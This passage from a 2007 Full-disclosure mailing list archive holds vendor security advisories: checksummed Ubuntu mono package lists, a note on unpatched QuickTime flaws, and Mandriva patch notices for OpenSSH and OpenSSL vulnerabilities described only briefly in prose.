    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   212064 640eaef5f37177a52d8b27478f3a5bfe
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   212662 354751e62bcadc90a6a965f4a729b0c4
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-dbg_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:  9778254 1087f0938f08a6d48cb19664f2690462
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gac_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    14182 8526ff35afd2cafb1b93616b9a1c3bf7
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-gmcs_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   511850 421b0534237a5522bffafcd8e71690e4
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-mcs_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   645124 5d294ac914fe57e9f6a4de27c6bc25ef
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-bytefx0.7.6.1-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    43894 3a5bd6fed94e1e12fc3c8f4f4274d682
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-bytefx0.7.6.2-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    43980 4e535c74196c95f4fa4e94c342a7a038
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-c5-1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   111768 a6fa060f2ac14da94b08a2427be49ace
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-cscompmgd7.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:     7254 ef75957c3836080328e4b56f5ad45d6f
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-cscompmgd8.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:     7516 f07ccf0bae57e1517093d29729a35616
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-firebirdsql1.7-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   186410 aac1f920872c34533238dae85ac3ef6e
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-ldap1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   100192 c1eae4b2839bc6c0a6a5ee9802110c32
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-ldap2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   100302 4a9854539a44f3af406416bbea83588a
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-microsoft7.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   130092 30b325738787551426b18a39a8482583
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-microsoft8.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:   130132 724abd7fd9be417060b4ff6cafa89445
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-npgsql1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    66320 b9ccac4b75eb03f19c34c2b196867615
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-npgsql2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    66412 c6a1882596fb19e8fd7aac76d0a6a47a
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-oracle1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    52966 a2c7092fdb79163579fafe02c23a6c41
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-oracle2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    52764 6cf7d5b74c48b69beef85d95fb13384f
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-relaxng2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    83840 9a0a89774757d88e79149f7b0e0ae7c1
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-sharpzip2.6-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    48640 63fadd29661e21bd017888d4df9e556c
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-ldap1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    19176 3789917bf0f032fd91fe8a5390e64512
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-ldap2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    19100 bfc918fa7117cef040dc5d948615cf1e
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-messaging1.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    27236 637f00080a5b150f087ec76088fb21c9
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/libmono-system-messaging2.0-cil_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:    27316 e161a39081b74d5ff4051e298d7daf97
    http://security.ubuntu.com/ubuntu/pool/universe/m/mono/mono-mjs_1.2.4-6ubuntu6.1_all.deb
      Size/MD5:     7928 890a484b67740c8ffb09416c3cd893cc

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.2.4-6ubuntu6.1_amd64.deb
      Size/MD5:  1158028 d54c2f6c309349e300956801dccf8559
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0-dbg_1.2.4-6ubuntu6.1_amd64.deb
      Size/MD5:  1265758 b3382448cc43ab386d3a1252e2b0d993
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.2.4-6ubuntu6.1_amd64.deb
      Size/MD5:   847918 f80ccd0ab9c150186e9def2460430a36
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.2.4-6ubuntu6.1_amd64.deb
      Size/MD5:   108942 75d3063e242314d3957b2fb2ec44a9b0
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.2.4-6ubuntu6.1_amd64.deb
      Size/MD5:     1150 37d83f0c80c8fc5773ba1f347f12fd6b
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.2.4-6ubuntu6.1_amd64.deb
      Size/MD5:    40452 497f955e865ba15898c4b5572f646f3b
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit-dbg_1.2.4-6ubuntu6.1_amd64.deb
      Size/MD5:  1201042 e6b94b487c929d5822a01a54f4639a3b
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.2.4-6ubuntu6.1_amd64.deb
      Size/MD5:   771332 36fc03f7aad5a009a07c4df662967fb5
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.2.4-6ubuntu6.1_amd64.deb
      Size/MD5:     1118 b16051b3ee35866420f50d23425d0a4e
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.2.4-6ubuntu6.1_amd64.deb
      Size/MD5:  1096836 282a37113b7e9adcece3f42667c3a314
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.4-6ubuntu6.1_amd64.deb
      Size/MD5:     1334 207093360b3af234f2caad6234915e04

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.2.4-6ubuntu6.1_i386.deb
      Size/MD5:  1070838 485668cadf1da2a56f708a454beacca6
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0-dbg_1.2.4-6ubuntu6.1_i386.deb
      Size/MD5:  1225082 67b485465b897adb1532273580cc2bec
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.2.4-6ubuntu6.1_i386.deb
      Size/MD5:   768100 750445bf7425b43bf412a0f119e24ec2
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.2.4-6ubuntu6.1_i386.deb
      Size/MD5:   108502 c3b8d104babd4d98192d59bf9e15ce4f
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.2.4-6ubuntu6.1_i386.deb
      Size/MD5:     1152 f43a6c9b38334d84d8d4a8764d54c660
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.2.4-6ubuntu6.1_i386.deb
      Size/MD5:    33486 a5e3658a55768d0b9ffbf258086cbe60
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit-dbg_1.2.4-6ubuntu6.1_i386.deb
      Size/MD5:  1153972 103bd3aa6bc8b07689b7db1eb1b92b46
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.2.4-6ubuntu6.1_i386.deb
      Size/MD5:   695556 6132c1b2b642ee0824c3e7cca1f5eb8d
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.2.4-6ubuntu6.1_i386.deb
      Size/MD5:     1118 2f5bf7e24ad487835129dc97a3fce438
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.2.4-6ubuntu6.1_i386.deb
      Size/MD5:  1010288 caae8f119ecc89aa33e04386445c0462
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.4-6ubuntu6.1_i386.deb
      Size/MD5:     1336 5bc806294d4e94106c1784b2d0536def

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.2.4-6ubuntu6.1_powerpc.deb
      Size/MD5:  1087460 737e85350c7d6f37e73f8772a1fc14ee
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0-dbg_1.2.4-6ubuntu6.1_powerpc.deb
      Size/MD5:  1214254 0d66654f94b9478c9b77b06f9329f880
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.2.4-6ubuntu6.1_powerpc.deb
      Size/MD5:   781972 e93404211aadfd3b716b1b000d51a498
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.2.4-6ubuntu6.1_powerpc.deb
      Size/MD5:   109536 9322000d4e24a14e4432421a47eb9565
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.2.4-6ubuntu6.1_powerpc.deb
      Size/MD5:     1152 d8220b2d44c6c664782e8b979cbe04b0
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.2.4-6ubuntu6.1_powerpc.deb
      Size/MD5:    39210 b985f6c8fc211930e72f0a60855bde51
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit-dbg_1.2.4-6ubuntu6.1_powerpc.deb
      Size/MD5:  1134614 8143fe4d2afbbf312b622a2f4373230b
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.2.4-6ubuntu6.1_powerpc.deb
      Size/MD5:   689300 1855ec4645a2dc5b4f20a7e9f1c65773
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.2.4-6ubuntu6.1_powerpc.deb
      Size/MD5:     1118 9c16781882bc0e82b684a095c0d6eeba
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.2.4-6ubuntu6.1_powerpc.deb
      Size/MD5:  1014066 edd3b4485abf10e035901d5b6032f5d9
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.4-6ubuntu6.1_powerpc.deb
      Size/MD5:     1336 289bf448e2ac790e891f22de8fd6b214

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.2.4-6ubuntu6.1_sparc.deb
      Size/MD5:  1148500 37d2ed72fd2bea06f4af2497696bce89
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0-dbg_1.2.4-6ubuntu6.1_sparc.deb
      Size/MD5:  1191424 998eac8885905bffc96e78972b16ee39
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.2.4-6ubuntu6.1_sparc.deb
      Size/MD5:   794530 fda13024980bfba8bce9bf383c952c27
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.2.4-6ubuntu6.1_sparc.deb
      Size/MD5:   109084 c200383e4679fa090c187f03f6599884
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.2.4-6ubuntu6.1_sparc.deb
      Size/MD5:     1152 7ee75ae78151f41dc06b66f96a8cbd75
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.2.4-6ubuntu6.1_sparc.deb
      Size/MD5:    36338 a39a3d404dafed967bb63b4dd8a92acd
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit-dbg_1.2.4-6ubuntu6.1_sparc.deb
      Size/MD5:  1105702 cca29346386b38e683cd5ab3bb1d497a
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.2.4-6ubuntu6.1_sparc.deb
      Size/MD5:   707764 5252be3f7c6292d42b953f5c40a7949b
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.2.4-6ubuntu6.1_sparc.deb
      Size/MD5:     1112 54f526daae560c2f58d4c40b1f6799dd
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.2.4-6ubuntu6.1_sparc.deb
      Size/MD5:  1027316 14db895caf9b3dcf25653343a6e12931
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.2.4-6ubuntu6.1_sparc.deb
      Size/MD5:     1338 eb35fae8569fc6aa9310b7709728fd2d

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071204/cd022088/attachment.bin 

From juha-matti.laurio at netti.fi  Wed Dec  5 00:53:13 2007
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Wed, 5 Dec 2007 02:53:13 +0200 (EET)
Subject: [Full-disclosure] The recent number of unpatched QuickTime flaws
	is: two
Message-ID: <16775401.3307941196815993665.JavaMail.juha-matti.laurio@netti.fi>

The QuickTime RTSP vulnerability reported on 23th Nov is not the only unpatched remote vulnerability in QuickTime player.

It appears that WabiSabiLabi team has reported that there is another (they call it zero-day vuln) flaw too, affecting to XP systems.

The CVE name for this second issue reported by unknown person is CVE-2007-6238. The CVSS score is 10.0, in turn.

I have written a summary with reference links here:
http://blogs.securiteam.com/?p=1046

- Juha-Matti



From security at mandriva.com  Wed Dec  5 03:18:16 2007
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 04 Dec 2007 20:18:16 -0700
Subject: [Full-disclosure] [ MDKSA-2007:236 ] - Updated openssh packages fix
 X11 cookie vulnerability
Message-ID: <E1Izkm8-0005Jc-Al@artemis.annvix.ca>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2007:236
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : openssh
 Date    : December 4, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________
 
 Problem Description:
 
 A flaw in OpenSSH prior to 4.7 prevented ssh from properly handling
 when an untrusted cookie could not be created and used a trusted X11
 cookie instead, which could allow attackers to violate intended policy
 and gain privileges by causing an X client to be treated as trusted.
 
 The updated packages have been patched to correct these issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4752
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 e04c3ab6175b622a65fe1a40fe52693f  2007.0/i586/openssh-4.5p1-0.2mdv2007.0.i586.rpm
 79ad72cdd5d02d29e1bc92a84853aa99  2007.0/i586/openssh-askpass-4.5p1-0.2mdv2007.0.i586.rpm
 d13252d924785d23495ceaa98c9dcc16  2007.0/i586/openssh-askpass-common-4.5p1-0.2mdv2007.0.i586.rpm
 2b21106f61185b6943425afa2d4a6098  2007.0/i586/openssh-askpass-gnome-4.5p1-0.2mdv2007.0.i586.rpm
 f36ce6d19951967248807d4acc259350  2007.0/i586/openssh-clients-4.5p1-0.2mdv2007.0.i586.rpm
 1a313da3c8131c0510ac7fc175b4ef9f  2007.0/i586/openssh-server-4.5p1-0.2mdv2007.0.i586.rpm 
 0e57aefb82391e7b1fbe92fb7e8d24d3  2007.0/SRPMS/openssh-4.5p1-0.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 2722de4c5806b442152bf6f229bc4efc  2007.0/x86_64/openssh-4.5p1-0.2mdv2007.0.x86_64.rpm
 a89e68e2e0271c02814b1406c1242057  2007.0/x86_64/openssh-askpass-4.5p1-0.2mdv2007.0.x86_64.rpm
 d2bc689960ccc27cfb542764fc472d4f  2007.0/x86_64/openssh-askpass-common-4.5p1-0.2mdv2007.0.x86_64.rpm
 3c6227baf2de94a774cef12cadc4d183  2007.0/x86_64/openssh-askpass-gnome-4.5p1-0.2mdv2007.0.x86_64.rpm
 360f13087ea6f63eaced8eb4fde23185  2007.0/x86_64/openssh-clients-4.5p1-0.2mdv2007.0.x86_64.rpm
 67c9ae2c8c25b6475e15c325a929a807  2007.0/x86_64/openssh-server-4.5p1-0.2mdv2007.0.x86_64.rpm 
 0e57aefb82391e7b1fbe92fb7e8d24d3  2007.0/SRPMS/openssh-4.5p1-0.2mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 a4dcfec27b0a3b81a749f10e435a0be2  2007.1/i586/openssh-4.6p1-1.1mdv2007.1.i586.rpm
 e4a784a3c12a303a6c018c363b207e1c  2007.1/i586/openssh-askpass-4.6p1-1.1mdv2007.1.i586.rpm
 972dd1ba1fc63d7ca3e3f7ba3513b81f  2007.1/i586/openssh-askpass-common-4.6p1-1.1mdv2007.1.i586.rpm
 bbd0e91b2950e0142d11df0343ce1af9  2007.1/i586/openssh-askpass-gnome-4.6p1-1.1mdv2007.1.i586.rpm
 360972495eeea43e15dc46fa4b46fd5c  2007.1/i586/openssh-clients-4.6p1-1.1mdv2007.1.i586.rpm
 3859f217f6180403ef0e9c9aee3f6b27  2007.1/i586/openssh-server-4.6p1-1.1mdv2007.1.i586.rpm 
 fd0d1245e9d80df411acfff848868e83  2007.1/SRPMS/openssh-4.6p1-1.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 c84ab8276ba205fc49c6fade4eeb4fc0  2007.1/x86_64/openssh-4.6p1-1.1mdv2007.1.x86_64.rpm
 564869cbbc4a53eb082a585fba2f91f7  2007.1/x86_64/openssh-askpass-4.6p1-1.1mdv2007.1.x86_64.rpm
 fcf1bd1893ebbf6c4d322a064ae73f4e  2007.1/x86_64/openssh-askpass-common-4.6p1-1.1mdv2007.1.x86_64.rpm
 ac83b2537b643d415f6077d30902cfe7  2007.1/x86_64/openssh-askpass-gnome-4.6p1-1.1mdv2007.1.x86_64.rpm
 479f39a1c7af953f86bcf5d34576a6be  2007.1/x86_64/openssh-clients-4.6p1-1.1mdv2007.1.x86_64.rpm
 cafc771d61a4d8a170e071ba789b3a90  2007.1/x86_64/openssh-server-4.6p1-1.1mdv2007.1.x86_64.rpm 
 fd0d1245e9d80df411acfff848868e83  2007.1/SRPMS/openssh-4.6p1-1.1mdv2007.1.src.rpm

 Corporate 3.0:
 f23aeae4f1581eb34b894e87dd8316ce  corporate/3.0/i586/openssh-4.3p1-0.4.C30mdk.i586.rpm
 3f37d58c43b5d6e8a81be5e2c06d5349  corporate/3.0/i586/openssh-askpass-4.3p1-0.4.C30mdk.i586.rpm
 a5d683a4b9d6d88b732985eae4976c83  corporate/3.0/i586/openssh-askpass-gnome-4.3p1-0.4.C30mdk.i586.rpm
 d3bede3976187ca6c9ed3cd853f50444  corporate/3.0/i586/openssh-clients-4.3p1-0.4.C30mdk.i586.rpm
 1fc0580c40b91c3d057db44eb56a640f  corporate/3.0/i586/openssh-server-4.3p1-0.4.C30mdk.i586.rpm 
 b352aac12da1f4363f053ad84c21cad8  corporate/3.0/SRPMS/openssh-4.3p1-0.4.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 1eaae01a333d19ecfe0f83aa677fef29  corporate/3.0/x86_64/openssh-4.3p1-0.4.C30mdk.x86_64.rpm
 89a6586cd975949b516af7ce7c33db7d  corporate/3.0/x86_64/openssh-askpass-4.3p1-0.4.C30mdk.x86_64.rpm
 3bd3c05fd5987ce3cb8e6c167291bad9  corporate/3.0/x86_64/openssh-askpass-gnome-4.3p1-0.4.C30mdk.x86_64.rpm
 87f1a7a82d27b4f3dec8c9acadad8e95  corporate/3.0/x86_64/openssh-clients-4.3p1-0.4.C30mdk.x86_64.rpm
 2647668c96642eac2d75f7b99ee6cafb  corporate/3.0/x86_64/openssh-server-4.3p1-0.4.C30mdk.x86_64.rpm 
 b352aac12da1f4363f053ad84c21cad8  corporate/3.0/SRPMS/openssh-4.3p1-0.4.C30mdk.src.rpm

 Corporate 4.0:
 030bbafc87663dede9e8bf21dc0d06fa  corporate/4.0/i586/openssh-4.3p1-0.5.20060mlcs4.i586.rpm
 4ba7690bee29194a46fbeae5ba0aa0c2  corporate/4.0/i586/openssh-askpass-4.3p1-0.5.20060mlcs4.i586.rpm
 a8835f6ae66a77b4f7ed336afe0b8427  corporate/4.0/i586/openssh-askpass-gnome-4.3p1-0.5.20060mlcs4.i586.rpm
 4579a47617a3cb39dfc8c8ce600fad97  corporate/4.0/i586/openssh-clients-4.3p1-0.5.20060mlcs4.i586.rpm
 5d4a6f91ad5199aa22e3fd68bc91e1bc  corporate/4.0/i586/openssh-server-4.3p1-0.5.20060mlcs4.i586.rpm 
 538f84577ba40e5e8694819dac96c9a5  corporate/4.0/SRPMS/openssh-4.3p1-0.5.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 64a174d447b1bdd4d208872761c93699  corporate/4.0/x86_64/openssh-4.3p1-0.5.20060mlcs4.x86_64.rpm
 a2e0aaa3f19ff1c4cd60eb532604e135  corporate/4.0/x86_64/openssh-askpass-4.3p1-0.5.20060mlcs4.x86_64.rpm
 395878603e050cc933b1881cc816e6bd  corporate/4.0/x86_64/openssh-askpass-gnome-4.3p1-0.5.20060mlcs4.x86_64.rpm
 b91a4ee6303eb5b2fdccd2dbafbf8489  corporate/4.0/x86_64/openssh-clients-4.3p1-0.5.20060mlcs4.x86_64.rpm
 b9e82cd190d6a267fabdf2811574ee7e  corporate/4.0/x86_64/openssh-server-4.3p1-0.5.20060mlcs4.x86_64.rpm 
 538f84577ba40e5e8694819dac96c9a5  corporate/4.0/SRPMS/openssh-4.3p1-0.5.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 71dac329eac3c804698a1baf0717fc9e  mnf/2.0/i586/openssh-4.3p1-0.4.M20mdk.i586.rpm
 3e795210f939969b244221a716ef9c4b  mnf/2.0/i586/openssh-askpass-4.3p1-0.4.M20mdk.i586.rpm
 c864e4f11bc5ef7b44dbeba9252fdea6  mnf/2.0/i586/openssh-askpass-gnome-4.3p1-0.4.M20mdk.i586.rpm
 2be73ab0fc2e6f4139112107f46f68ae  mnf/2.0/i586/openssh-clients-4.3p1-0.4.M20mdk.i586.rpm
 3f4920bdbff70c3616c897d42524f379  mnf/2.0/i586/openssh-server-4.3p1-0.4.M20mdk.i586.rpm 
 d6dc4b60683bf87868733497ceb2b69c  mnf/2.0/SRPMS/openssh-4.3p1-0.4.M20mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHVe7/mqjQ0CJFipgRAkuEAJ9py2q4Zyl6ibUECYFtAwyD1SdEQgCeNWQw
kl/z1GUtJ30yBEVaxF9Dp2k=
=mAsp
-----END PGP SIGNATURE-----



From security at mandriva.com  Wed Dec  5 03:24:36 2007
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 04 Dec 2007 20:24:36 -0700
Subject: [Full-disclosure] [ MDKSA-2007:237 ] - Updated openssl packages fix
	DTLS vulnerability
Message-ID: <E1IzksG-0005Vo-3b@artemis.annvix.ca>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2007:237
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : openssl
 Date    : December 4, 2007
 Affected: 2007.0, 2007.1, 2008.0
 _______________________________________________________________________
 
 Problem Description:
 
 A buffer overflow in the DTLS implementation of OpenSSL 0.9.8 could
 be exploited by attackers to potentially execute arbitrary code. It
 is questionable as to whether the DTLS support even worked or is used
 in any applications; as a result this flaw most likely does not affect
 most Mandriva users.
 
 The updated packages have been patched to correct these issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4995
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 29b8ee6237c242e753d086635b7e5cbe  2007.0/i586/libopenssl0.9.8-0.9.8b-2.4mdv2007.0.i586.rpm
 e0c95ca66571cd7143bff6e4c25b027a  2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.4mdv2007.0.i586.rpm
 cdfeee7908dd612a55be9dfe76463f26  2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.4mdv2007.0.i586.rpm
 0372a27cd2fbd7f742d2e516bed7e1e2  2007.0/i586/openssl-0.9.8b-2.4mdv2007.0.i586.rpm 
 e9afd585fa9767297b830b5a39b1c755  2007.0/SRPMS/openssl-0.9.8b-2.4mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 a4e123f19b83f50a9d6d07b5f8de1770  2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.4mdv2007.0.x86_64.rpm
 3249d71ae70e88dd56a32779992305e6  2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.4mdv2007.0.x86_64.rpm
 3de284ee38d421db9e0e17fc2f21590e  2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.4mdv2007.0.x86_64.rpm
 513aeae7d510454807d195b1c4d5dd37  2007.0/x86_64/openssl-0.9.8b-2.4mdv2007.0.x86_64.rpm 
 e9afd585fa9767297b830b5a39b1c755  2007.0/SRPMS/openssl-0.9.8b-2.4mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 86e63fec6b9657748cc42e8362e97744  2007.1/i586/libopenssl0.9.8-0.9.8e-2.3mdv2007.1.i586.rpm
 2c9543f02f824e684dcb0aa0fad5d84e  2007.1/i586/libopenssl0.9.8-devel-0.9.8e-2.3mdv2007.1.i586.rpm
 b697526216ebaf30d80e2f7f3cf7aa61  2007.1/i586/libopenssl0.9.8-static-devel-0.9.8e-2.3mdv2007.1.i586.rpm
 592011ab8eb3dd7e4aa840688c3b4ca5  2007.1/i586/openssl-0.9.8e-2.3mdv2007.1.i586.rpm 
 8104a922d5698d8289d000a39b2c4230  2007.1/SRPMS/openssl-0.9.8e-2.3mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 5c5d79ec812456e36b1cf6dee6bf4f37  2007.1/x86_64/lib64openssl0.9.8-0.9.8e-2.3mdv2007.1.x86_64.rpm
 0f05616372680ef165b32c6c4b58e63f  2007.1/x86_64/lib64openssl0.9.8-devel-0.9.8e-2.3mdv2007.1.x86_64.rpm
 f62edfc3bee2982f51895c953bc7928d  2007.1/x86_64/lib64openssl0.9.8-static-devel-0.9.8e-2.3mdv2007.1.x86_64.rpm
 67b3f1e4a2d6f170c28a675cf2b75db5  2007.1/x86_64/openssl-0.9.8e-2.3mdv2007.1.x86_64.rpm 
 8104a922d5698d8289d000a39b2c4230  2007.1/SRPMS/openssl-0.9.8e-2.3mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 20491db3430fabf6e27844e96bd4284a  2008.0/i586/libopenssl0.9.8-0.9.8e-8.1mdv2008.0.i586.rpm
 bb3685c8ff31f5d1ff2b05f07aabf4f8  2008.0/i586/libopenssl0.9.8-devel-0.9.8e-8.1mdv2008.0.i586.rpm
 9a3d5debe8da358efe0e46b13ed0d8e6  2008.0/i586/libopenssl0.9.8-static-devel-0.9.8e-8.1mdv2008.0.i586.rpm
 272dcfdd768169e374fe195be5c75f1a  2008.0/i586/openssl-0.9.8e-8.1mdv2008.0.i586.rpm 
 ac6a1a0ee09b5ee6e9f496d758e7f4c7  2008.0/SRPMS/openssl-0.9.8e-8.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 21185b1271dbf340b8a554ce233228b5  2008.0/x86_64/lib64openssl0.9.8-0.9.8e-8.1mdv2008.0.x86_64.rpm
 d517a6325f26d0f8d0abe29bf6098b0f  2008.0/x86_64/lib64openssl0.9.8-devel-0.9.8e-8.1mdv2008.0.x86_64.rpm
 421e8bd33abf4be23587d38e0d6abac4  2008.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8e-8.1mdv2008.0.x86_64.rpm
 fc6dff2056b1be3554024c9cfe10a2dd  2008.0/x86_64/openssl-0.9.8e-8.1mdv2008.0.x86_64.rpm 
